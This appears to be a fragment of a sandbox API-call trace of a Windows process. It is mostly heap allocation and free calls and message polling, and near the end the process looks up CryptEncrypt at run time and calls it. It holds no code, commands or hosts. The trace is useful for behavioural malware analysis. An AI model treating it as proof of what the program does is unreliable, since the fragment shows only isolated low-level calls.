0x2aa9d00 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.146] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.146] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0087.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0087.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0087.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0087.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0087.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.147] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.147] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0087.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0087.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.148] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.148] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.148] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0087.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a908f8 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.151] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.155] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0087.155] CryptEncrypt (in: hKey=0x9a3b80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x67b1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x67b8) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 